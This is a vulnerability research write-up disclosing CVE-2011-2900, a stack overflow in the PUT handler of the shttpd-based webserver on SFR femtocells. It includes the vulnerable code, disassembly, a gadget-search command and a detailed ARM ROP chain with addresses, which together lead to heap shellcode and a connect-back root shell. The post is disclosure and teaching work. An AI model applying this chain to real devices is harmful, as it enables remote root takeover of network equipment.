As part of our research on the SFR femtocell, I had the pleasure of looking for a vulnerability that might assist us in compromising remote devices.
One of the obvious software targets on the box was the webserver (wsal), which serves the web pages used for configuring the device.
Like all other services on the box, it runs with root privileges. The device itself runs Linux 2.6.18-ubi-sys-V2.0.17 on an ARM926EJ (ARMv5).
The bug (CVE-2011-2900):
I started reversing the binary when at some point Kevin pointed out a string in the binary that hinted at the open source project shttpd (which was renamed to mongoose at some point and is also the basis for the yassl embedded webserver).
So this made things a lot easier. As the web service is fairly powerful (including CGI, SSI support) I first looked for non-software related bugs.
From shttpd.c/defs.h:
struct vec {
const char *ptr;
int len;
};
const struct vec known_http_methods[] = {
{"GET", 3},
{"POST", 4},
{"PUT", 3},
{"DELETE", 6},
{"HEAD", 4},
{NULL, 0}
};
Hmm, that's already more methods than expected. So it made sense to look at those methods.
As the webserver can execute CGI I assumed PUT might be interesting in order to push stuff onto the device and execute it.
However, it turned out that the web directory is mounted read-only (and the code gracefully handles path traversal attempts).
DELETE died for the same reason and it seemed unlikely that this would result in code execution anyway.
Back to software vulnerabilities and the PUT functionality.
Let's have a look at the function handling PUT requests (io_dir.c/put_dir()):
int put_dir(const char *path) {
char buf[FILENAME_MAX];
const char *s, *p;
struct stat st;
size_t len;
for (s = p = path + 2; (p = strchr(s, '/')) != NULL; s = ++p) {
len = p - path;
assert(len < sizeof(buf));
(void) memcpy(buf, path, len);
buf[len] = '\0';
if (my_stat(buf, &st) == -1 && my_mkdir(buf, 0755) != 0)
return (-1);
if (p[1] == '\0') return (0);
}
return (1);
}
The function is pretty simple. It loops over the URL path and tries to create each directory of the complete path (similar to mkdir -p).
To do that, the path prefix up to the current / is copied into the stack buffer buf before it is passed to stat and mkdir.
The len argument of the memcpy operation is the distance from the start of path to the current / character.
Assuming that path can be longer than FILENAME_MAX (+/- a few bytes overhead for the rest of the URL), this is a classical stack-based buffer overflow and seemed like a nice candidate for code execution.
In this code snippet the len argument is guarded against overflow (the assert statement). However, assert is only in place if the binary was not compiled with -DNDEBUG, right?
I hadn't seen any calls to an assert wrapper function while looking at the disassembly of wsal.
But let's check this...
The following output was generated using radare.
If you're on Linux, need a multi-arch reversing toolchain (with the Unix philosophy in mind) and can't or don't want to use IDA, I can highly recommend looking at this tool (even though it's still a work in progress).
[0x0000b454]> pD 100@sym.put_dir
0x0007d898 sym.put_dir:
0x0007d898 0 f0412de9 push {r4, r5, r6, r7, r8, lr}
0x0007d89c 0 41dd4de2 sub sp, sp, #4160 ; 0x1040
0x0007d8a0 0 18d04de2 sub sp, sp, #24 ; 0x18
0x0007d8a4 0 18708de2 add r7, sp, #24 ; 0x18
0x0007d8a8 0 9c809fe5 ldr r8, [pc, #156] ; 0x0007d94c; => 0xffffefa8
0x0007d8ac 0 0060a0e1 mov r6, r0
0x0007d8b0 0 187047e2 sub r7, r7, #24 ; 0x18
0x0007d8b4 0 023080e2 add r3, r0, #2 ; 0x2
0x0007d8b8 0 2f10a0e3 mov r1, #47 ; 0x2f
0x0007d8bc 0 0300a0e1 mov r0, r3
0x0007d8c0 0> fd34feeb bl imp.strchr
; imp.strchr() [1]
0x0007d8c4 0 005050e2 subs r5, r0, #0 ; 0x0
0x0007d8c8 0 054066e0 rsb r4, r6, r5
0x0007d8cc 0 0610a0e1 mov r1, r6
0x0007d8d0 0 0420a0e1 mov r2, r4
0x0007d8d4 0 0d00a0e1 mov r0, sp
0x0007d8d8 0 1400000a beq 0x0007d930 [2]
0x0007d8dc 0> 3e35feeb bl imp.memcpy
As we can see, we see nothing. In particular, no comparison and no call to __assert_fail.
So we're lucky, looks like we found our candidate for code execution. A pretty simple standard buffer overflow.
Interestingly, the shttpd Makefile even mentions -DNDEBUG in order to save ~5kB binary size (remember, this is an embedded device).
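To illustrate why relying on assert is fragile here, the following is a minimal sketch of a length check that stays in the binary regardless of -DNDEBUG. The helper name copy_prefix is hypothetical and not part of shttpd; it only shows the kind of runtime check that put_dir() would need around its memcpy.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/*
 * Hypothetical helper (not part of shttpd): copy the first `len` bytes of
 * `path` into `buf` and NUL-terminate the result. Prefixes that do not fit
 * are rejected at runtime, so the check survives a build with -DNDEBUG.
 */
int copy_prefix(char *buf, size_t bufsize, const char *path, size_t len)
{
    if (bufsize == 0 || len >= bufsize)
        return -1;              /* would overflow buf: refuse the copy */
    memcpy(buf, path, len);
    buf[len] = '\0';
    return 0;
}
```

A caller would treat a return value of -1 like any other failure and bail out of the loop instead of copying.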
Let's look at how put_dir returns so we can get control over the program flow.
On function entry, registers r4-r8 and the link register are pushed onto the stack.
The exit looks similar, with the difference that the link register isn't used; the return address is popped directly into pc.
[0x0000b454]> pD 12@sym.put_dir+140
0x0007d924 0 58d08de2 add sp, sp, #88 ; 0x58
0x0007d928 0 01da8de2 add sp, sp, #4096 ; 0x1000
0x0007d92c 0 f081bde8 pop {r4, r5, r6, r7, r8, pc}
The pc register is equivalent to EIP on x86 with the difference that you can directly read and write to it.
As it is popped from our overflowed stack buffer, this would give us direct control over the program flow.
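The distance between buf and the saved pc can be read off the prologue. The sketch below just does that arithmetic; it assumes that buf starts exactly at sp (which the `mov r0, sp` before the memcpy call suggests) and that the six pushed registers sit directly above the local frame. The function names are made up for illustration.

```c
#include <assert.h>
#include <stddef.h>

enum {
    FRAME_SUB_A = 4160, /* sub sp, sp, #4160 */
    FRAME_SUB_B = 24,   /* sub sp, sp, #24 */
    SAVED_REGS  = 6,    /* push {r4, r5, r6, r7, r8, lr} */
    REG_SIZE    = 4     /* 32-bit registers */
};

/* Offset from the start of buf (assumed to be at sp) to the saved r4. */
size_t saved_regs_offset(void)
{
    return FRAME_SUB_A + FRAME_SUB_B;
}

/* Offset from the start of buf to the slot that is popped into pc. */
size_t saved_pc_offset(void)
{
    /* pc is the last of the six popped words, so skip the first five. */
    return saved_regs_offset() + (SAVED_REGS - 1) * REG_SIZE;
}
```

Under these assumptions the local frame is 4184 bytes, which matches the `add sp, sp, #88` plus `add sp, sp, #4096` in the epilogue, and the word at offset 4204 ends up in pc. Note that len counts from the start of path, so the root prefix that is prepended to the URI is part of those bytes.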
Now the interesting question was: does wsal also support this request type, or does it never call this function?
[0x0000b454]> pw 48@sym.known_http_methods
0x0008ea90 0x0008e704 0x00000003 0x0008e708 0x00000004 ................
0x0008ead0 0x0008e710 0x00000003 0x0008266c 0x00000006 ........l&......
0x0008eb10 0x0008e714 0x00000004 0x00000000 0x00000000 ................
[0x0000b454]> # here we can already see that this is the vec struct
[0x0000b454]> # lets look for PUT
[0x0000b454]> ps @0x0008e710
PUT
This made it clear that the wsal binary also supports PUT.
Looking at shttpd.c, it seems that PUT as well as DELETE should only be enabled for authorized users (which probably wouldn't be a big problem), but funnily the Makefile also states:
# -DNO_AUTH - disable authorization support (-4kb)
which was of course also set by wsal.
Exploitation:
Exploitation of this seemed rather straightforward given the nature of this bug.
The stack was marked non-executable in the ELF binary, but fortunately the ARMv5 doesn't support the XN bit yet.
However, experimenting with this bug I noticed fairly quickly that ASLR is enabled on the device and our stack address is randomized.
As a result, I couldn't just place my shellcode into buf and jump right to it.
ROP would've been an option, but as my ARM knowledge was limited before playing with this bug, I didn't like this option (even though, as we will see, I needed it anyway, just not for the actual payload).
Return-to-libc, e.g. by returning to system(), was not an interesting option either, as there is no network binary such as netcat installed on the box.
So I had to find something else. And as it turned out, support for heap randomization as well as library randomization arrived pretty late on ARM. As Kees points out, this started in 2.6.37.
This takes care of one possible problem. As path was not the original request buffer, but only a copy of it, I started looking for other copies of my input or for the possibility to put the payload somewhere else (e.g. a POST body, HTTP headers...).
First, I checked where path is coming from (shttpd.c/decide_what_to_do()):
static void decide_what_to_do(struct conn *c){
char path[URI_MAX], buf[1024], *root;
...
url_decode(c->uri, strlen(c->uri), c->uri, strlen(c->uri) + 1);
remove_double_dots(c->uri);
...
if (strlen(c->uri) + strlen(root) >= sizeof(path)) {
send_server_error(c, 400, "URI is too long");
return;
}
(void) my_snprintf(path, sizeof(path), "%s%s", root, c->uri);
...
if (c->ch.range.v_vec.len > 0) {
send_server_error(c, 501, "PUT Range Not Implemented");
} else if ((rc = put_dir(path)) == 0) {
send_server_error(c, 200, "OK");
}
There we go, path originates from c->uri, which is URL-decoded in place.
One important thing we have to take into account at this point is that the URL can't be of arbitrary length: together with root it is checked against URI_MAX.
We have to overflow a buffer in put_dir() with a length of FILENAME_MAX...
However, we are lucky: URI_MAX is defined as 16384 (config.h) while FILENAME_MAX from put_dir is an alias for MAX_PATH, which is defined as 4096.
So where is c->uri coming from? Again we look at shttpd.c, this time the parse_http_request() function:
static void parse_http_request(struct conn *c) {
...
} else if ((c->uri = malloc(uri_len + 1)) == NULL) {
send_server_error(c, 500, "Cannot allocate URI");
} else {
my_strlcpy(c->uri, (char *) start, uri_len + 1);
parse_headers(c->headers, (c->request + req_len) - c->headers, &c->ch);
...
decide_what_to_do(c);
}
As we can see, c->uri is allocated on the heap. Since, as I mentioned, heap randomization was introduced pretty late on ARM/Linux, I assumed I could just jump right into the heap copy of my input.
There is a nice side-effect of using the heap copy of the buffer to place our shellcode.
Because url_decode() is called on the complete uri length, we have no restrictions whatsoever regarding the bytes we can include in our final shellcode: it can include zeros and the like in url-encoded form.
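Since every byte can be smuggled in percent-encoded, the simplest way to prepare a payload is to encode all of it. The following is a minimal sketch of such an encoder; the function name percent_encode_all is hypothetical and this is not taken from the actual exploit.

```c
#include <assert.h>
#include <stddef.h>

/*
 * Hypothetical helper: encode every input byte as %XX so that arbitrary
 * bytes (including 0x00) survive as part of a URL.
 * `out` must have room for 3 * n + 1 bytes.
 * Returns the number of characters written (without the terminator),
 * or -1 if the output buffer is too small.
 */
int percent_encode_all(const unsigned char *in, size_t n,
                       char *out, size_t outsize)
{
    static const char hex[] = "0123456789ABCDEF";
    size_t i, o = 0;

    if (outsize < 3 * n + 1)
        return -1;
    for (i = 0; i < n; i++) {
        out[o++] = '%';
        out[o++] = hex[in[i] >> 4];     /* high nibble */
        out[o++] = hex[in[i] & 0x0f];   /* low nibble */
    }
    out[o] = '\0';
    return (int) o;
}
```

Encoding everything triples the size of the request, so with the URI_MAX limit in mind a real payload might only encode the bytes that actually need it.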
Anyway, a few minutes later it became clear that I couldn't just jump right to it:
# cat /proc/480/maps
00008000-0009f000 r-xp 00000000 1f:06 6002148 /opt/ubiquisys/primary/bin/wsal
000a6000-000a8000 rw-p 00096000 1f:06 6002148 /opt/ubiquisys/primary/bin/wsal
000a8000-000c9000 rwxp 000a8000 00:00 0 [heap]
...
402eb000-402f6000 r-xp 00000000 1f:05 2926580 /lib/libgcc_s.so.1
402f6000-402fd000 ---p 0000b000 1f:05 2926580 /lib/libgcc_s.so.1
402fd000-402fe000 rw-p 0000a000 1f:05 2926580 /lib/libgcc_s.so.1
402fe000-4040c000 r-xp 00000000 1f:05 1481528 /lib/libc-2.3.6.so
4040c000-40414000 ---p 0010e000 1f:05 1481528 /lib/libc-2.3.6.so
40414000-40416000 r--p 0010e000 1f:05 1481528 /lib/libc-2.3.6.so
40416000-40417000 rw-p 00110000 1f:05 1481528 /lib/libc-2.3.6.so
...
While the leading zero was not a problem for the input itself (because I can just URL-encode it), put_dir has a problem with it.
If we recall, the loop uses strchr to determine len.
So if we include a zero before the terminating / in the URL to jump to our heap buffer, strchr stops at the zero and our buffer overflow never happens.
However, the path copy that is passed to put_dir() is created using snprintf(), and the machine is little-endian, so the zero byte of such an address is the last of its four bytes in memory.
Therefore, we can include exactly one zero, at the very end of the url-decoded, stack-based path buffer (in decide_what_to_do()), and pop the address including the zero from there.
It just has to be past the / character that we need to get a large len value.
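The byte layout behind this trick can be sketched as follows. The helper name put_tail_addr is made up, and the address used in the usage note is a hypothetical value inside the heap range from the map output, not the one from the real exploit.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Hypothetical helper: lay out a 32-bit address in little-endian order at
 * the tail of a C string, so that the string's NUL terminator doubles as
 * the most significant byte of the address.
 * Returns 0 on success, -1 if the address cannot be expressed this way.
 */
int put_tail_addr(unsigned char *dst, uint32_t addr)
{
    unsigned char b0 = (unsigned char) (addr & 0xff);
    unsigned char b1 = (unsigned char) ((addr >> 8) & 0xff);
    unsigned char b2 = (unsigned char) ((addr >> 16) & 0xff);
    unsigned char b3 = (unsigned char) ((addr >> 24) & 0xff);

    if (b3 != 0)
        return -1;  /* top byte must be the terminating zero */
    if (b0 == 0 || b1 == 0 || b2 == 0)
        return -1;  /* an earlier zero would end the string too soon */
    dst[0] = b0;
    dst[1] = b1;
    dst[2] = b2;
    dst[3] = 0;     /* terminator == most significant address byte */
    return 0;
}
```

For example, 0x000a9c40 is stored as the bytes 40 9c 0a 00, while an address such as 0x000a8000 is rejected because its low bytes already contain zeros.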
How do we pop it from there after our buffer was overwritten and the stack frame of put_dir() has been torn down?
Here is where some ROP is needed (or call it jump-oriented).
When put_dir() returns, the stack pointer sits below the path stack buffer of decide_what_to_do(). That buffer was passed by address to put_dir() (from where it was copied into put_dir's own stack buffer) and is already url-decoded.
So if we can lift our stack pointer back up, it should be possible to pop an address with a leading zero from this buffer.
Looking at the mentioned program map output, it is visible that libc and libgcc are mapped at addresses without a leading zero. Their base is also not randomized.
I didn't have any particular tool to find ROP snippets, but as all ARM instructions are word-aligned, it was easy to find suitable instructions with objdump and grep. In particular:
objdump -d /lib/libc-2.3.6.so | grep -A 2 -E 'add sp, sp,.*' | grep -B 2 -E 'pop.*(pc|lr)'
(this can also be done with radare if you're more advanced in using it than I am).
This way I searched for stack lifting instructions followed by an instruction that pops stack buffer content to pc or the link register in order to regain control.
I found a good candidate:
[0x00013994]> pD 8@sym.sigprocmask+108
0x00028ea0 0 84d08de2 add sp, sp, #132 ; 0x84
0x00028ea4 0 f080bde8 pop {r4, r5, r6, r7, pc}
This was perfect. Now I could just make my first jump to this snippet, lift the stack pointer back into my buffer, place the address of sigprocmask+108 url-encoded
in my buffer (together with fake r4-r7 values) and lift the stack until I'm past the / character and pop my zero-address from there.
The goal was still to jump to the shellcode in the heap copy of the buffer.
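Turning a gadget offset into the address that goes into the overflow can be sketched like this. It assumes that the offsets radare prints are relative to the library's load base and that libc is mapped at 0x402fe000 as in the map output above; both helper names are made up.

```c
#include <assert.h>
#include <stdint.h>

/* Absolute address of a gadget, given the library base and its offset. */
uint32_t gadget_addr(uint32_t base, uint32_t offset)
{
    return base + offset;
}

/*
 * Returns 1 if any of the four bytes of v is zero. Such a value cannot be
 * placed before the final '/' because strchr would stop at the zero byte.
 */
int has_zero_byte(uint32_t v)
{
    return (v & 0x000000ffu) == 0 || (v & 0x0000ff00u) == 0 ||
           (v & 0x00ff0000u) == 0 || (v & 0xff000000u) == 0;
}
```

With these assumptions, sigprocmask+108 at offset 0x28ea0 would end up at 0x40326ea0, which contains no zero byte and can therefore sit in the part of the path that overflows buf.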
The ARM-stacle:
This would work well if the target architecture weren't ARM.
There is an important constraint on ARM when writing exploits. Unlike x86, the ARM core used here follows a Harvard-style architecture.
This means that the instruction and data caches are separate and not kept coherent automatically. I didn't know this at first.
A result of this was that when hitting my heap shellcode, the program crashed with a SIGILL.
However, analyzing the coredump and the pc at that time always showed correct instructions.
Due to the Harvard architecture, my shellcode is written through the data cache.
But in order to execute it, it needs to be written back from the data cache to main memory, and the instruction cache must not hold stale contents for that address range.
Because that hadn't happened, the coredump displayed instructions that weren't actually what the CPU fetched, resulting in SIGILL due to whatever was executed as instructions at this point.
It turns out that there are two solutions to this problem. The first one is a simple instruction (MCR). However, it is limited to kernel mode.
The other option is a cache-flush syscall that takes 3 arguments: a start address, an end address and flags. This seemed nice.
Even nicer, wsal links against libgcc, which provides a wrapper to do that:
[0x000023e0]> pD 32@sym.__clear_cache
0x00004484 sym.__clear_cache:
0x00004484 0 04702de5 push {r7} ; (str r7, [sp, #-4]!)
0x00004488 0 0020a0e3 mov r2, #0 ; 0x0
0x0000448c 0 08709fe5 ldr r7, [pc, #8] ; 0x0000449c; => 0x000f0002
0x00004490 0 02009fef svc 0x009f0002
; syscall[0x27e][0]=?
0x00004494 0 8000bde8 pop {r7}
0x00004498 0 1eff2fe1 bx lr
Crafting the 0x009f0002 by ROP would've been a bit painful I suppose so this wrapper was nice.
So before jumping to our shellcode, we need to call this syscall.
A small excerpt from linux-2.6/arch/arm/kernel/traps.c to better understand this syscall:
static inline void do_cache_op(unsigned long start, unsigned long end, int flags) {
struct mm_struct *mm = current->active_mm;
struct vm_area_struct *vma;
if (end < start || flags)
return;
down_read(&mm->mmap_sem);
vma = find_vma(mm, start);
if (vma && vma->vm_start < end) {
if (start < vma->vm_start)
start = vma->vm_start;
if (end > vma->vm_end)
end = vma->vm_end;
flush_cache_user_range(vma, start, end);
}
up_read(&mm->mmap_sem);
}
Some places suggest that you can pass 0 as the start and -1 (0xffffffff) as the end to this syscall and flush everything.
However, this doesn't seem to work, and looking at this function I also don't understand why it should.
find_vma() (from mmap.c) traverses the kernel's internal tree representation until it finds the first virtual memory area that satisfies start < vma->vm_end. So if the start address is zero, this returns the lowest mapping of the process, which will hardly ever be the area holding attacker-controlled payload (unless you are very lucky). Flushing the complete memory range doesn't work either: as we see, end is clamped to vma->vm_end if it lies beyond the end of that vma.
To sum up, we really need proper values: a heap address lower than or equal to our shellcode address in r0 and an end address beyond our payload in r1 (r2, the flags, is zeroed by __clear_cache() itself).
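The clamping behaviour is easy to reproduce in user space. The sketch below is a simplified model of do_cache_op() and find_vma(), not kernel code: the struct and function names are made up, and the list of areas in the usage note is taken from the first three lines of the map output above.

```c
#include <assert.h>
#include <stddef.h>

struct area { unsigned long start, end; };   /* half-open range [start, end) */

/* Model of find_vma(): first area whose end lies above addr.
 * The areas are expected to be sorted by ascending address. */
const struct area *find_area(const struct area *a, size_t n,
                             unsigned long addr)
{
    size_t i;

    for (i = 0; i < n; i++)
        if (addr < a[i].end)
            return &a[i];
    return NULL;
}

/* Model of do_cache_op(): stores the range that would be flushed in *out
 * and returns 1, or returns 0 if nothing would be flushed. */
int flushed_range(const struct area *a, size_t n,
                  unsigned long start, unsigned long end, struct area *out)
{
    const struct area *v;

    if (end < start)
        return 0;
    v = find_area(a, n, start);
    if (v == NULL || v->start >= end)
        return 0;
    out->start = start < v->start ? v->start : start;  /* clamp to the area */
    out->end = end > v->end ? v->end : end;
    return 1;
}
```

Fed with the wsal text, data and heap mappings, a request for 0 to 0xffffffff only covers 0x8000-0x9f000 (the text segment) in this model, whereas a start of 0xa8000 with a large end covers the whole heap up to 0xc9000.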
As __clear_cache() returns using the link register, we furthermore have to fill that with a proper value to regain control after flushing the cache.
So the plan is: overflow the buffer, lift our stack to a place where we can pop arbitrary addresses (these two steps could also be exchanged), flush the cache, jump to shellcode.
The following shows the ROP sequences required to perform this. Searching for these instructions was also simply done using objdump and grep:
[0x00013994]> pD 12@sym.makecontext+0x1c
0x00036410 0 04e09de4 pop {lr} ; (ldr lr, [sp], #4)
0x00036414 0 08d08de2 add sp, sp, #8 ; sym.__libc_errno
0x00036418 0 1eff2fe1 bx lr
; ------------
[0x00013994]> # here we pop lr from our input stack buffer, so we can properly return from __clear_cache
[0x00013994]> # we will jump to a random instruction that pops us pc from the stack and in this case r4 even though we don't need it, this way we gain control back after __clear_cache
[0x00013994]> pD 4@sym.free_slotinfo+0x80
0x000f537c 0 1080bde8 pop {r4, pc}
[0x00013994]> # lets fill our range register now
[0x00013994]> pD 4@sym.__aeabi_cfcmple+0x10
0x000f3928 0 0f80bde8 pop {r0, r1, r2, r3, pc}
[0x00013994]> # we don't need r0,r2 and r3, however r1 will pop our range which will be CCCC
[0x00013994]> # at this point we have to get our buffer address into r0
[0x00013994]> # we are lucky and a heap address in front of our payload resides in r11 already (due to previous function calls)
[0x00013994]> # r11 is equivalent to fp
[0x00013994]> # so let's move it..
[0x00013994]> pD 8@sym.envz_merge+0xb8
0x00070bbc 0 0b00a0e1 mov r0, fp
0x00070bc0 0 f08bbde8 pop {r4, r5, r6, r7, r8, r9, fp, pc}
[0x00013994]> # after this step the address of __clear_cache will be popped into pc and the syscall executes flushing our heap range
[0x00013994]> # it returns control to the link register value pointing to the previous snippet popping r4 and pc
[0x00013994]> # which pops our 0 leading heap address into pc and executes the shellcode
Mission accomplished. The shellcode used then executes a connect-back shell!
As a result, this is a remote root for SFR femtocells.
The complete exploit is available here.
It needs slight modification in case you modified your firmware, e.g. with library hooking.
As mentioned before, depending on how the shttpd/mongoose/yassl embedded webservers have been compiled, they may be affected by the same problem.
The exact code for them differs slightly, but all of them contain the same bug if compiled with the right options.
Slides of our presentation:
http://femto.sec.t-labs.tu-berlin.de/bh2011.pdf
UPDATE: it seems they have fixed the issue in the latest firmware release (V2.0.24.1) by disabling the PUT functionality completely.